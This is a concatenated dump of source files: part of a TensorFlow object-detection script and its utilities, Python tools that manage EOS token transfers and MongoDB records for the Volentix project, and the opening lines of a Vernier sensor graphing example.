feed_dict={image_tensor: frame_expanded},
options=options, run_metadata=run_metadata)
timer.tictic()
if config.WRITE_TIMELINE:
timeliner.write_timeline(run_metadata.step_stats,
'test_results/timeline_{}{}{}{}.json'.format(
config.OD_MODEL_NAME,'_SM1',config._DEV,config._OPT))
timer.tic()
# CPU Session
boxes, scores, classes, num = sess.run(
[tensor_dict['detection_boxes'], tensor_dict['detection_scores'], tensor_dict['detection_classes'], tensor_dict['num_detections']],
feed_dict={score_in:score, expand_in: expand},
options=options, run_metadata=run_metadata)
timer.toc()
if config.WRITE_TIMELINE:
timeliner.write_timeline(run_metadata.step_stats,
'test_results/timeline_{}{}{}{}.json'.format(
config.OD_MODEL_NAME,'_SM2',config._DEV,config._OPT))
else:
# default session
frame = cv2.resize(cv2.imread(image),(config.WIDTH,config.HEIGHT))
frame_expanded = np.expand_dims(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB), axis=0)
timer.tic()
output_dict = sess.run(tensor_dict,
feed_dict={image_tensor: frame_expanded},
options=options, run_metadata=run_metadata)
timer.toc()
if config.WRITE_TIMELINE:
timeliner.write_timeline(run_metadata.step_stats,
'test_results/timeline_{}{}{}.json'.format(
config.OD_MODEL_NAME,config._DEV,config._OPT))
num = output_dict['num_detections'][0]
classes = output_dict['detection_classes'][0]
boxes = output_dict['detection_boxes'][0]
scores = output_dict['detection_scores'][0]
if 'detection_masks' in output_dict:
masks = output_dict['detection_masks'][0]
else:
masks = None
# reformat detection
num = int(num)
boxes = np.squeeze(boxes)
classes = np.squeeze(classes).astype(np.uint8)
scores = np.squeeze(scores)
# Visualization
vis = visualize_objectdetection(frame,boxes,classes,scores,masks,category_index,timer.get_frame(),
config.MAX_FRAMES,timer.get_fps(),config.PRINT_INTERVAL,config.PRINT_TH,
config.OD_MODEL_NAME+config._DEV+config._OPT,config.VISUALIZE)
if not vis:
break
cv2.destroyAllWindows()
timer.stop()
if __name__ == '__main__':
config = Config()
config.display()
model = Model('od', config.OD_MODEL_NAME, config.OD_MODEL_PATH, config.LABEL_PATH,
config.NUM_CLASSES, config.SPLIT_MODEL, config.SSD_SHAPE).prepare_od_model()
detection(model,config)
```
#### File: src/realtime_object_detection/tf_utils.py
```python
import logging
import tensorflow as tf
from google.protobuf import text_format
try:
from realtime_object_detection.protos import string_int_label_map_pb2
except:
print("> running local python script")
from protos import string_int_label_map_pb2
def reframe_box_masks_to_image_masks(box_masks, boxes, image_height,
image_width):
"""Transforms the box masks back to full image masks.
Embeds masks in bounding boxes of larger masks whose shapes correspond to
image shape.
Args:
box_masks: A tf.float32 tensor of size [num_masks, mask_height, mask_width].
boxes: A tf.float32 tensor of size [num_masks, 4] containing the box
corners. Row i contains [ymin, xmin, ymax, xmax] of the box
corresponding to mask i. Note that the box corners are in
normalized coordinates.
image_height: Image height. The output mask will have the same height as
the image height.
image_width: Image width. The output mask will have the same width as the
image width.
Returns:
A tf.float32 tensor of size [num_masks, image_height, image_width].
"""
def transform_boxes_relative_to_boxes(boxes, reference_boxes):
boxes = tf.reshape(boxes, [-1, 2, 2])
min_corner = tf.expand_dims(reference_boxes[:, 0:2], 1)
max_corner = tf.expand_dims(reference_boxes[:, 2:4], 1)
transformed_boxes = (boxes - min_corner) / (max_corner - min_corner)
return tf.reshape(transformed_boxes, [-1, 4])
box_masks = tf.expand_dims(box_masks, axis=3)
num_boxes = tf.shape(box_masks)[0]
unit_boxes = tf.concat(
[tf.zeros([num_boxes, 2]), tf.ones([num_boxes, 2])], axis=1)
reverse_boxes = transform_boxes_relative_to_boxes(unit_boxes, boxes)
image_masks = tf.image.crop_and_resize(image=box_masks,
boxes=reverse_boxes,
box_ind=tf.range(num_boxes),
crop_size=[image_height, image_width],
extrapolation_value=0.0)
return tf.squeeze(image_masks, axis=3)
def load_labelmap(path):
"""Loads label map proto.
Args:
path: path to StringIntLabelMap proto text file.
Returns:
a StringIntLabelMapProto
"""
with tf.gfile.GFile(path, 'r') as fid:
label_map_string = fid.read()
label_map = string_int_label_map_pb2.StringIntLabelMap()
try:
text_format.Merge(label_map_string, label_map)
except text_format.ParseError:
label_map.ParseFromString(label_map_string)
_validate_label_map(label_map)
return label_map
def convert_label_map_to_categories(label_map,
max_num_classes,
use_display_name=True):
"""Loads label map proto and returns categories list compatible with eval.
This function loads a label map and returns a list of dicts, each of which
has the following keys:
'id': (required) an integer id uniquely identifying this category.
'name': (required) string representing category name
e.g., 'cat', 'dog', 'pizza'.
We only allow class into the list if its id-label_id_offset is
between 0 (inclusive) and max_num_classes (exclusive).
If there are several items mapping to the same id in the label map,
we will only keep the first one in the categories list.
Args:
label_map: a StringIntLabelMapProto or None. If None, a default categories
list is created with max_num_classes categories.
max_num_classes: maximum number of (consecutive) label indices to include.
use_display_name: (boolean) choose whether to load 'display_name' field
as category name. If False or if the display_name field does not exist,
uses 'name' field as category names instead.
Returns:
categories: a list of dictionaries representing all possible categories.
"""
categories = []
list_of_ids_already_added = []
if not label_map:
label_id_offset = 1
for class_id in range(max_num_classes):
categories.append({
'id': class_id + label_id_offset,
'name': 'category_{}'.format(class_id + label_id_offset)
})
return categories
for item in label_map.item:
if not 0 < item.id <= max_num_classes:
logging.info('Ignore item %d since it falls outside of requested '
'label range.', item.id)
continue
if use_display_name and item.HasField('display_name'):
name = item.display_name
else:
name = item.name
if item.id not in list_of_ids_already_added:
list_of_ids_already_added.append(item.id)
categories.append({'id': item.id, 'name': name})
return categories
def create_category_index(categories):
"""Creates dictionary of COCO compatible categories keyed by category id.
Args:
categories: a list of dicts, each of which has the following keys:
'id': (required) an integer id uniquely identifying this category.
'name': (required) string representing category name
e.g., 'cat', 'dog', 'pizza'.
Returns:
category_index: a dict containing the same entries as categories, but keyed
by the 'id' field of each category.
"""
category_index = {}
for cat in categories:
category_index[cat['id']] = cat
return category_index
def _validate_label_map(label_map):
"""Checks if a label map is valid.
Args:
label_map: StringIntLabelMap to validate.
Raises:
ValueError: if label map is invalid.
"""
for item in label_map.item:
if item.id < 1:
raise ValueError('Label map ids should be >= 1.')
``` |
{
"source": "4ban/volentix_tools",
"score": 2
} |
#### File: volentix_tools/creator/runner.py
```python
from pymongo import MongoClient
import logging
import configparser
import json
import subprocess
import os
import time
import random
def execute(key, name):
out = ''
try:
out = subprocess.run(['cleos', '-u', EOS_RPC, 'system', 'newaccount', EOS_CREATOR, name, key, key, '--stake-net', '0.001 EOS', '--stake-cpu', '0.001 EOS', '--buy-ram-kbytes', '3', '-p' , EOS_CREATOR], timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
out = str(out)
except subprocess.TimeoutExpired as e:
print('FAIL:TIMEOUT: ', key, name)
print('Timeout. Can not execute transaction.\n' + str(e))
logging.error("FAIL:TIMEOUT: %s - %s" % (key, name))
logging.error("Timeout. Can not execute transaction.: %s" % str(e))
return False
except Exception as e:
print('FAIL:EXCEPTION: ', key, name)
print('Could not execute transaction.\n' + str(e))
logging.error("FAIL:EXCEPTION: %s - %s" % (key, name))
logging.error("Could not execute transaction: %s" % str(e))
return False
else:
if 'Error' in out:
print('FAIL:ERROR: ', key, name)
print(out)
logging.error("FAIL:ERROR: %s - %s" % (key, name))
logging.error("%s" % out)
return False
else:
print('PASS: %s - %s' % (key, name))
# print(out)
logging.info("PASS: %s - %s" % (key, name))
logging.info("%s" % out)
return True
def setup():
accounts_to_create = {}
with open('final.list', 'r') as f:
for line in f:
(key, val) = line.replace('\n', '').split('-')
accounts_to_create[key.strip()] = val.strip()
for key, value in accounts_to_create.items():
success = execute(key, value)
if success:
time.sleep(1.5)
if __name__ == "__main__":
filename = 'runner.log'
try:
open(filename, 'w').close()
except Exception as e:
print(e)
try:
logging.basicConfig(format='%(levelname)s:%(asctime)s:%(message)s',
filename=filename,
level=logging.DEBUG,
datefmt='%m/%d/%Y %I:%M:%S %p')
except Exception as e:
logging.error('ConfigParser: %s' % e)
print(e)
else:
logging.info('Launch the app.')
config = configparser.ConfigParser()
try:
config.read('creator_config')
logging.info('Config reading.')
except Exception as e:
logging.error('Could not read the config: %s', e)
print(e)
else:
default = config['DEFAULT']
MONGODB_URL = default.get('MONGODB_URL') or ''
MONGODB_USER = default.get('MONGODB_USER') or ''
MONGODB_PASS = default.get('MONGODB_PASS') or ''
EOS_RPC = default.get('EOS_RPC') or ''
EOS_CREATOR = default.get('EOS_CREATOR') or ''
DB = default.get('DB') or ''
COLLECTION = default.get('COLLECTION') or ''
TIMEOUT = int(default.get('TIMEOUT')) or 10
try:
logging.info('Run runner.')
setup()
except KeyboardInterrupt:
logging.warning('Exit the app. Keyboard interruption.')
print('\nKeyboard interruption. \nExit.')
except Exception as e:
logging.error('Exit by other reason: %s', e)
print(e)
```
#### File: volentix_tools/deductor/preparator.py
```python
from pymongo import MongoClient
import logging
import configparser
import requests
import json
import subprocess
import os
import time
import random
import string
# volentixtrez 454990000.0000 VTX
# volentixprvt 65000000.0000 VTX
# volentixprir 130000000.0000 VTX
# vtxsmsupport 99000000.0000 VTX
# vtxmesupport 99000000.0000 VTX
# vtxcontribut 156000000.0000 VTX
# volentixtrus 0.0000 VTX
IGNORE = ['4d8c0d7f1fdbbc3431af5d42b41156fe3e5c71610e8156ced118526585fae93e',
'<KEY>',
'c0eedbf7f9dfe7667215858b5cc9409e0f3392f091db5ae188b8e7d9bc35f58b',
'<KEY>',
'9d654e9f88d877f14872414e1dce1bb7f1418277497d3469f31c6ce4a96b6656',
'0c097f6583fc4bd5ba13f69b4835049fb7454df7997d8a14fa42e339e7efe3be',
'5713b36e24f9c0f8e05629f954b2a1d25818c86aed597a4b2a0e0857825acfec',
'aa76534cad4fd8e05b4eddd9791b3bfad421f6eef266bc835dab1bfd088a88a8',
'<KEY>',
'af7ba352ddf2af60ba76627a0f861281deaf62e3dcd3b6b8a541d016f30b5c4c',
'8c3cebace66ab62f71b58d4a3b67487c4dd29f4fa5522e9d6e60182cc0c5ca52',
'<KEY>',
'448c2308ceec2710a2cf35695718563fa3243d813a6de3669672331a0e4040b4',
'd7096a1e0ef05cf3db73334961283cd038ef30a4094561a92041eaecf9821049',
'8d2be77b12c6084709f0d11aa994fbdb64624ed4102305527155c461cb2826a4',
]
NOT_SURE = ['<KEY>',
'29e5c450ed1b2a22f92670e153cfd35371f62088a04fd3b99e3552ee0c226119',
'<KEY>',
'f0fb35299cd87e5e2567e26d625e7f2320b942bc0ae5254af0842afa8719b5a0',
'<KEY>',
'96fbdb3cc900afbacfe43debbaadfac6430c4dfcef7993afc6ccd7e42abe28b3',
'286c07710de1d5007ffeaf582afe59fa2bd769e80a7ceeb581f5ca22aa2ed312',
'664a97eba801039730f609ef13918c200afd5bb132de27c4a77064c1fb6036b1',
'5b1c371264c3ea00480ef0e60a3d69d433aabef915de3a9d7fe6dc66aa3282e0',
'f4178f2fc31dd30d75df1b03767cba24fa8f3ac738725d8f0d4f46a703ac2b11',
'90bd1ff92bc588648fe00093537c3596415db8efe18ea4f69ae55e9eed1203bc',
'1a886672d7c704e462c9c9459209592261b00d773af9751123b64ebb2d393b4e',
'ada7dbafe02168d63d7c891c9f16c90cc49c20d80de1a7310a0d118cb292b474',
'<KEY>',
'9b8b65d3bea4466bd3e0a28b309f4c96e924b224ea39c540fac4a7ec26ed3fad',
'<KEY>',
'420cfea73ed6b410e62f2d19fac0ca391f2758d566e4ba2ead79cfb2ed63c263',
'1652c961f19a75727b266147f68c03c1e75c3a0538772cfec8f6907c437de8f6',
'54c8ebdc0dc181e937707977206d4de09a3e70a914c72cf52163159747c8a89b',
'd739ee7156c3432c219fb70bafaa4ff41a38df63598a6370c3010b457c67fd52',
'8ecdd32b9c399176ea395cd466a27649e030716ba9818c8b6aca02fb199e75b3',
'2115065c74a2ca19f21a577e24fe5cfdeb0015412ee24a21d2d76c5848fe76e8',
'b3d881bdfb0f4ad694404aa68bd0be764d1f63e9ce5d4a52ac39c1d9dcff50c5',
'5aa4d4d6a84832ea28245a6d8edf632bf55278e0b9057f2aef8511ecc9e64fb3',
'444fc2362e32f49849ccb7768c1222fd399d445674552b1304b1769e3dadff41',
'2e6023872166063ad06b0f6cfe616935f884c109e10b14d30597ea3609f2c7d9',
'ef6aac24992fe3ed827f3bda2234b02d6334852e17b128dfdd5258e020706c03',
'c18b30ee0f576dd8c861fb56f6bfdcbf10449c25979f68a00bacafa636db98ec',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'<KEY>',
'c9971a942fb9533dab7ad2108bc7cdaacaf62c300547154aff07d8f74722bac6',
]
def get_account(key):
try:
out = subprocess.run(['cleos', '-u', EOS_RPC, 'get', 'accounts', key],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
out = 'Timeout. Can not get accounts\n' + str(e)
except Exception as e:
out = 'Could not get accounts\n' + str(e)
else:
if 'Error' in out:
return out
else:
return json.loads(out)
def get_stats(collection):
# Total tokens will be sent
total_tokens = 0
total_counter = 0
vtxsmsupport = 0
smsu_counter = 0
volentixprvt = 0
prvt_counter = 0
volentixprir = 0
prir_counter = 0
volentixtrez = 0
trez_counter = 0
vtxcontribut = 0
cont_counter = 0
for document in collection.find():
if document['trx_id'] in IGNORE or document['trx_id'] in NOT_SURE:
continue
else:
if float(document['amount']) <= 1000:
total_tokens += float(document['amount'])
total_counter +=1
if document['fromaccount'] == 'vtxsmsupport':
vtxsmsupport += float(document['amount'])
smsu_counter += 1
if document['fromaccount'] == 'volentixprvt':
volentixprvt += float(document['amount'])
prvt_counter += 1
if document['fromaccount'] == 'volentixprir':
volentixprir += float(document['amount'])
prir_counter += 1
if document['fromaccount'] == 'volentixtrez':
volentixtrez += float(document['amount'])
trez_counter += 1
if document['fromaccount'] == 'vtxcontribut':
vtxcontribut += float(document['amount'])
cont_counter += 1
print('total: ', total_tokens, total_counter)
print('vtxsmsupport: ', vtxsmsupport, smsu_counter)
print('volentixprvt: ', volentixprvt, prvt_counter)
print('volentixprir: ', volentixprir, prir_counter)
print('volentixtrez: ', volentixtrez, trez_counter)
print('vtxcontribut: ', vtxcontribut, cont_counter)
def setup():
try:
client = MongoClient(
MONGODB_URL, username=MONGODB_USER, password=<PASSWORD>)
except Exception as e:
logging.error('Connect to the mongo: %s' % e)
print(e)
try:
db = client[DB]
except Exception as e:
logging.error('Mongo database: %s' % e)
print(e)
try:
collection = db[COLLECTION]
TOTAL_DOCUMENTS = collection.count_documents({})
except Exception as e:
logging.error('Mongo collection: %s' % e)
print(e)
with open('ignore.list', 'w') as f:
for trx in IGNORE:
f.write("%s\n" % (trx))
for trx in NOT_SURE:
f.write("%s\n" % (trx))
print(EOS_RPC)
print('TOTAL: ', TOTAL_DOCUMENTS)
# total number of tokens to send
# get_stats(collection)
counter = 1
with open('execute.list', 'w') as f:
for document in collection.find():
# Remove blacklisted transactions
if document['trx_id'] in IGNORE or document['trx_id'] in NOT_SURE:
continue
else:
# Remove transactions below 1000
if float(document['amount']) <= 1000:
# if document['fromaccount'] == 'vtxsmsupport':
amount = "{0:.4f}".format(float(document['amount']))
account = get_account(document['tokey'].strip())['account_names']
print(counter, document['trx_id'], document['tokey'], document['fromaccount'], amount, account)
logging.info("%s - %s - %s - %s - %s" % (document['trx_id'], document['tokey'], document['fromaccount'], amount, account))
f.write("%s - %s - %s - %s - %s\n" % (document['trx_id'], document['tokey'], document['fromaccount'], amount, account))
amount = ''
account = ''
counter +=1
print("*"*150)
logging.info("Start executing.")
if __name__ == "__main__":
filename = 'preparator.log'
try:
open(filename, 'w').close()
except Exception as e:
print(e)
try:
logging.basicConfig(format='%(levelname)s:%(asctime)s:%(message)s',
filename=filename,
level=logging.DEBUG,
datefmt='%m/%d/%Y %I:%M:%S %p')
except Exception as e:
logging.error('ConfigParser: %s' % e)
print(e)
else:
logging.info('Launch the app.')
config = configparser.ConfigParser()
try:
config.read('deductor_config')
logging.info('Config reading.')
except Exception as e:
logging.error('Could not read the config: %s', e)
print(e)
else:
default = config['DEFAULT']
MONGODB_URL = default.get('MONGODB_URL') or ''
MONGODB_USER = default.get('MONGODB_USER') or ''
MONGODB_PASS = default.get('MONGODB_PASS') or ''
EOS_RPC = default.get('EOS_RPC') or ''
POOL_API = default.get('POOL_API') or ''
EOS_CREATOR = default.get('EOS_CREATOR') or ''
DB = default.get('DB') or ''
COLLECTION = default.get('COLLECTION') or ''
TIMEOUT = int(default.get('TIMEOUT')) or 10
try:
logging.info('Run preparator.')
setup()
except KeyboardInterrupt:
logging.warning('Exit the app. Keyboard interruption.')
print('\nKeyboard interruption. \nExit.')
except Exception as e:
logging.error('Exit by other reason: %s', e)
print(e)
```
#### File: volentix_tools/executor/executor.py
```python
from pymongo import MongoClient
import logging
import configparser
import json
import subprocess
import os
import time
# Initial balances:
# volentixtrez 454990000.0000 VTX
# volentixprvt 65000000.0000 VTX
# volentixprir 130000000.0000 VTX
# vtxsmsupport 99000000.0000 VTX
# vtxmesupport 99000000.0000 VTX
# vtxcontribut 156000000.0000 VTX
# volentixtrus 0.0000 VTX
def runKeosd():
stopKeosd()
try:
out = os.spawnl(os.P_NOWAIT, 'keosd', '--unlock-timeout', '90000')
except Exception as e:
print(e)
return 'Could not run keosd: ' + str(e)
else:
return 'Run keosd: ' + str(out)
def stopKeosd():
try:
out = subprocess.run(['cleos', 'wallet', 'stop'], timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = e
except Exception as e:
print(e)
out = e
finally:
return 'Stop keosd: ' + str(out)
def get_balances():
accounts = ['volentixprvt', 'volentixprir', 'volentixtrez', 'vtxcontribut', 'vtxsmsupport', 'vtxmesupport', 'volentixtrus']
balances = {}
for x in accounts:
try:
out = subprocess.run(['cleos', '-u', EOS_RPC, 'get', 'currency', 'balance', 'volentixgsys', x],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
out = 'Timeout. Can not get balance\n' + str(e)
except Exception as e:
out = 'Could not get balance\n' + str(e)
else:
balances[x] = str(out).replace('\n','')
return balances
def showBad(document):
# TODO fix the conditions so that it doesn't display duplicates
if len(document['tokey']) < 50:
print(document['trx_id'], " - ", document['tokey'])
if len(document['tokey']) != 53:
print(document['trx_id'], " - ", document['tokey'])
if float(document['amount']) <= 0:
print(document['trx_id'], " - ", document['amount'])
if float(document['amount']) > 5000000:
print(document['trx_id'])
if "EOS" not in document['tokey']:
print(document['trx_id'], " - ", document['tokey'])
if 'test' in document['comment']:
print(document['trx_id'], " - ", document['comment'])
if float(document['amount']) >= 500000 and float(document['amount']) <= 5000000:
print(document['trx_id'], " - ", document['tokey'], " - ", document['amount'])
def execute(fromaccount, toaccount, amount, tokey, comment, nonce, trx_id):
amount = "{0:.4f}".format(float(amount))
body = ''
out = ''
try:
body = '[\"'+fromaccount+'\",\"'+toaccount+'\",\"'+amount +' VTX'+'\",\"'+tokey+'\",\"'+'Ledger: '+comment+'\",\"'+nonce+'\"]'
out = subprocess.run(['cleos', '-u', EOS_RPC, 'push', 'action', 'crowdfledger', 'rcrdtfr', body, '-p', 'crowdfledger'],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
out = str(out)
except subprocess.TimeoutExpired as e:
print('FAIL:TIMEOUT: ', fromaccount, toaccount, amount, tokey, comment, nonce)
print('Timeout. Can not execute transaction.\n' + str(e))
logging.error("FAIL:TIMEOUT: %s, %s, %s, %s, %s, %s, %s" % (fromaccount, toaccount, amount, tokey, comment, nonce, trx_id))
logging.error("Timeout. Can not execute transaction.: %s" % str(e))
return False
except Exception as e:
print('FAIL:EXCEPTION: ', fromaccount, toaccount, amount, tokey, comment, nonce)
print('Could not execute transaction.\n' + str(e))
logging.error("FAIL:EXCEPTION: %s, %s, %s, %s, %s, %s, %s" % (fromaccount, toaccount, amount, tokey, comment, nonce, trx_id))
logging.error("Could not execute transaction: %s" % str(e))
return False
else:
if 'Error' in out:
if 'overdrawn balance' in out:
if fromaccount == 'vtxsmsupport':
try:
fromaccount = "vtxmesupport"
comment = 'Ledger: Change crowdfund pool: vtxsmsupport -> vtxmesupport'
body = '[\"'+fromaccount+'\",\"'+toaccount+'\",\"'+amount +' VTX'+'\",\"'+tokey+'\",\"'+comment+'\",\"'+nonce+'\"]'
out = subprocess.run(['cleos', '-u', EOS_RPC, 'push', 'action', 'crowdfledger', 'rcrdtfr', body, '-p', 'crowdfledger'],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
out = str(out)
except subprocess.TimeoutExpired as e:
print('FAIL:TIMEOUT:CHANGE_POOL: ', fromaccount, toaccount, amount, tokey, comment, nonce)
print('Timeout. Can not execute transaction.\n' + str(e))
logging.error("FAIL:TIMEOUT:CHANGE_POOL: %s, %s, %s, %s, %s, %s, %s" % (fromaccount, toaccount, amount, tokey, comment, nonce, trx_id))
logging.error("Timeout. Can not execute transaction: %s" % str(e))
return False
except Exception as e:
print('FAIL:EXCEPTION:CHANGE_POOL: ', fromaccount, toaccount, amount, tokey, comment, nonce)
print('Could not execute transaction.\n' + str(e))
logging.error("FAIL:EXCEPTION:CHANGE_POOL: %s, %s, %s, %s, %s, %s, %s" % (fromaccount, toaccount, amount, tokey, comment, nonce, trx_id))
logging.error("Could not execute transaction: %s" % str(e))
return False
else:
print('PASS:CHANGE_POOL: ', fromaccount, toaccount, amount, tokey, comment, nonce)
print(out)
logging.info("PASS:CHANGE_POOL: %s, %s, %s, %s, %s, %s, %s" % (fromaccount, toaccount, amount, tokey, comment, nonce, trx_id))
logging.info("%s" % out)
return True
print('FAIL:ERROR: ', fromaccount, toaccount, amount, tokey, comment, nonce)
print(out)
logging.error("FAIL:ERROR: %s, %s, %s, %s, %s, %s, %s" % (fromaccount, toaccount, amount, tokey, comment, nonce, trx_id))
logging.error("%s" % out)
return False
else:
print('PASS: ', fromaccount, toaccount, amount, tokey, comment, nonce)
print(out)
logging.info("PASS: %s, %s, %s, %s, %s, %s, %s" % (fromaccount, toaccount, amount, tokey, comment, nonce, trx_id))
logging.info("%s" % out)
return True
def setup():
try:
client = MongoClient(MONGODB_URL,username=MONGODB_USER,password=<PASSWORD>DB_<PASSWORD>)
except Exception as e:
logging.error('Connect to the mongo: %s' % e)
print(e)
try:
db = client[DB]
except Exception as e:
logging.error('Mongo database: %s' % e)
print(e)
try:
collection = db[COLLECTION]
TOTAL_DOCUMENTS = collection.count_documents({})
except Exception as e:
logging.error('Mongo collection: %s' % e)
print(e)
print("Unique keys: ", len(collection.distinct('tokey')))
print("#"*45)
balances = get_balances()
for key, value in balances.items():
print("%s - %s" % (key, value))
logging.info("Balance: %s - %s" % (key, value))
print("#"*45)
PASSED_DOCUMENTS = 0
logging.info("Start executing.")
for document in collection.find():
showBad(document)
# stat = execute(document['fromaccount'],
# document['toaccount'],
# document['amount'],
# document['tokey'],
# document['comment'],
# document['nonce'],
# document['trx_id'])
# if stat:
# PASSED_DOCUMENTS +=1
# time.sleep(1.5)
# print(PASSED_DOCUMENTS,"/",TOTAL_DOCUMENTS)
print("#"*45)
balances = get_balances()
for key, value in balances.items():
print("%s - %s" % (key, value))
logging.info("Balance: %s - %s" % (key, value))
print("#"*45)
print("Total documents in collection:", TOTAL_DOCUMENTS)
print("Passed documents in collection:", PASSED_DOCUMENTS)
logging.info("Total documents in collection: %s" % TOTAL_DOCUMENTS)
logging.info("Passed documents in collection: %s" % PASSED_DOCUMENTS)
print("#"*45)
if __name__ == "__main__":
filename = 'executor.log'
try:
open(filename, 'w').close()
except Exception as e:
print(e)
try:
logging.basicConfig(format='%(levelname)s:%(asctime)s:%(message)s',
filename=filename,
level=logging.DEBUG,
datefmt='%m/%d/%Y %I:%M:%S %p')
except Exception as e:
logging.error('ConfigParser: %s' % e)
print(e)
else:
logging.info('Launch the app.')
config = configparser.ConfigParser()
try:
config.read('executor_config')
logging.info('Config reading.')
except Exception as e:
logging.error('Could not read the config: %s', e)
print(e)
else:
default = config['DEFAULT']
MONGODB_URL = default.get('MONGODB_URL') or ''
MONGODB_USER = default.get('MONGODB_USER') or ''
MONGODB_PASS = default.get('MONGODB_PASS') or ''
EOS_RPC = default.get('EOS_RPC') or ''
DB = default.get('DB') or ''
COLLECTION = default.get('COLLECTION') or ''
TIMEOUT = int(default.get('TIMEOUT')) or 10
try:
logging.info('Run executor.')
# print(runKeosd())
setup()
except KeyboardInterrupt:
# print(stopKeosd())
logging.warning('Exit the app. Keyboard interruption.')
print('\nKeyboard interruption. \nExit.')
except Exception as e:
# print(stopKeosd())
logging.error('Exit by other reason: %s', e)
print(e)
```
#### File: volentix_tools/updater/updater.py
```python
from pymongo import MongoClient
import urllib.parse
import requests
import logging
import configparser
import json
def get_pool(trx_id):
try:
data = requests.get(POOL_API+trx_id)
except Exception as e:
print(e)
logging.error("Couldn't get the data: %s" % e)
else:
raw = json.loads(data.text)
if raw['success']:
return raw['pool'].strip()
else:
return ''
def setup():
try:
client = MongoClient(MONGODB_URL,username=MONGODB_USER,password=<PASSWORD>)
except Exception as e:
logging.error('Connect to the mongo: %s' % e)
print(e)
try:
db = client[DB]
except Exception as e:
logging.error('Mongo database: %s' % e)
print(e)
try:
collection = db[COLLECTION]
TOTAL_DOCUMENTS = collection.count_documents({})
except Exception as e:
logging.error('Mongo collection: %s' % e)
print(e)
UPDATED_DOCUMENTS = 0
for document in collection.find():
pool = get_pool(document['trx_id'])
# Update transaction if there is a pool for it
if pool:
try:
collection.update_one({"trx_id": document['trx_id']}, {"$set": {"fromaccount": pool}})
except Exception as e:
print("Couldn't update: %s, %s" % (document['trx_id'], e))
logging.error("Couldn't update: %s, with pool: %s. Error: %s" % (document['trx_id'], pool, e))
else:
logging.debug("Update: [%s] with pool: %s" % (document, pool))
print("%s = %s -> %s" % (document['trx_id'], document['fromaccount'], pool))
logging.info("%s = %s -> %s" % (document['trx_id'], document['fromaccount'], pool))
UPDATED_DOCUMENTS+=1
else:
# Update transaction with private pool transaction is valid and there is no pool for it
if 'EOS' in document['tokey'] and len(document['tokey']) > 50:
try:
collection.update_one({"trx_id": document['trx_id']}, {"$set": {"fromaccount": 'volentixprvt'}})
except Exception as e:
print("Couldn't update: %s, %s" % (document['trx_id'], e))
logging.error("Couldn't update: %s, with pool: %s. Error: %s" % (document['trx_id'], 'volentixprvt', e))
else:
logging.debug("Update: [%s] with pool: %s" % (document, 'volentixprvt'))
print("%s = %s --> %s" % (document['trx_id'], document['fromaccount'], 'volentixprvt'))
logging.info("%s = %s -> %s" % (document['trx_id'], document['fromaccount'], 'volentixprvt'))
UPDATED_DOCUMENTS+=1
# Delete transaction if it is not valid
# else:
# try:
# collection.delete_one({"trx_id": document['trx_id']})
# except Exception as e:
# print("Couldn't delete: %s, %s" % (document['trx_id'], e))
# logging.error("Couldn't delete: %s. Error: %s" % (document['trx_id'], e))
# else:
# logging.debug("Delete: [%s]" % (document))
# print("%s = %s -> [IGNORE]" % (document['trx_id'], document['fromaccount']))
# logging.info("%s = %s -> [IGNORE]" % (document['trx_id'], document['fromaccount']))
print("#"*45)
print("Total documents in collection:", TOTAL_DOCUMENTS)
print("Updated documents in collection:", UPDATED_DOCUMENTS)
logging.info("Total documents in collection: %s" % TOTAL_DOCUMENTS)
logging.info("Updated documents in collection: %s" % UPDATED_DOCUMENTS)
print("#"*45)
def upd():
try:
client = MongoClient(
MONGODB_URL, username=MONGODB_USER, password=<PASSWORD>DB_PASS)
except Exception as e:
logging.error('Connect to the mongo: %s' % e)
print(e)
try:
db = client[DB]
except Exception as e:
logging.error('Mongo database: %s' % e)
print(e)
try:
collection = db[COLLECTION]
TOTAL_DOCUMENTS = collection.count_documents({})
except Exception as e:
logging.error('Mongo collection: %s' % e)
print(e)
try:
collection.update_many({"toaccount": "vtxtrust"}, {"$set": {"toaccount": "volentixtrus"}})
except Exception as e:
print("Couldn't update: %s" % e)
UPDATED_DOCUMENTS = collection.count_documents({'toaccount': 'volentixtrus'})
print("#"*45)
print("Total documents in collection:", TOTAL_DOCUMENTS)
print("Updated documents in collection:", UPDATED_DOCUMENTS)
logging.info("Total documents in collection: %s" % TOTAL_DOCUMENTS)
logging.info("Updated documents in collection: %s" % UPDATED_DOCUMENTS)
print("#"*45)
if __name__ == "__main__":
filename = 'updater.log'
try:
open(filename, 'w').close()
except Exception as e:
print(e)
try:
logging.basicConfig(format='%(levelname)s:%(asctime)s:%(message)s',
filename=filename,
level=logging.DEBUG,
datefmt='%m/%d/%Y %I:%M:%S %p')
except Exception as e:
logging.error('ConfigParser: %s' % e)
print(e)
else:
logging.info('Launch the app.')
config = configparser.ConfigParser()
try:
config.read('updater_config')
logging.info('Config reading.')
except Exception as e:
logging.error('Could not read the config: %s', e)
print(e)
else:
default = config['DEFAULT']
MONGODB_URL = default.get('MONGODB_URL') or ''
MONGODB_USER = default.get('MONGODB_USER') or ''
MONGODB_PASS = default.get('MONGODB_PASS') or ''
POOL_API = default.get('POOL_API') or ''
DB = default.get('DB') or ''
COLLECTION = default.get('COLLECTION') or ''
try:
logging.info('Run updater.')
setup()
# upd()
except KeyboardInterrupt:
logging.warning('Exit the app. Keyboard interruption.')
print('\nKeyboard interruption. \nExit.')
except Exception as e:
logging.error('Exit by other reason: %s', e)
print(e)
``` |
{
"source": "4beddgroup221/godirect-examples",
"score": 3
} |
#### File: godirect-examples/python/gdx_getting_started_graphing.py
```python
import time
import matplotlib.pyplot as plt
from gdx import gdx #The gdx function calls are from a gdx.py file inside the gdx folder, which must be with this program.
